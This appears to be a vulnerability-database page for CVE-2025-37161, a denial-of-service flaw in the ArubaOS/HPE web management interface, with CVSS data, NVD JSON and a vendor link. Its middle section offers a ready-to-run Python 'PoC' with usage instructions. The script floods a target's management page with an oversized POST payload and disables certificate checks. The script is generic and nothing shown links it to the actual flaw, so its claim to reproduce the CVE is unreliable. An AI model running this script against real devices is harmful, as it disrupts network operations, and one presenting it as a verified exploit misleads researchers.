Security Vulnerability Report
CVE-2025-37161 CVSS 7.5 HIGH

CVE-2025-37161

Published: 2025-11-18 20:15:46
Last Modified: 2026-02-13 16:31:48

Description

A vulnerability in the web-based management interface of affected products could allow an unauthenticated remote attacker to cause a denial of service. Successful exploitation could allow an attacker to crash the system, preventing it from rebooting without manual intervention and disrupting network operations.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
HPE products (refer to the official HPE security advisory for specific versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-37161 PoC - DoS against HPE Web Management Interface
# Usage: python poc.py <target_ip> [port]


def check_vulnerability(target, port=443):
    """Check if target is vulnerable"""
    url = f"https://{target}:{port}/"
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-37161-PoC)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Malformed request that triggers DoS condition
    payload = {
        'action': 'submit',
        'data': 'A' * 10000  # Oversized payload
    }

    try:
        print(f"[*] Sending DoS payload to {url}")
        response = requests.post(url, data=payload, headers=headers,
                                 timeout=10, verify=False)
        print(f"[+] Request sent, status code: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[!] Target may be experiencing DoS condition (timeout)")
    except Exception as e:
        print(f"[-] Error: {str(e)}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    check_vulnerability(target, port)

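References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us&docLocale=en_US (Vendor Advisory)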

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37161", "sourceIdentifier": "[email protected]", "published": "2025-11-18T20:15:46.180", "lastModified": "2026-02-13T16:31:47.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of affected products could allow an unauthenticated remote attacker to cause a denial of service. Successful exploitation could allow an attacker to crash the system, preventing it from rebooting without manual intervention and disrupting network operations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.7.2.0", "matchCriteriaId": "E1D4DF06-641C-40FD-AC80-F104B0319E2E"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}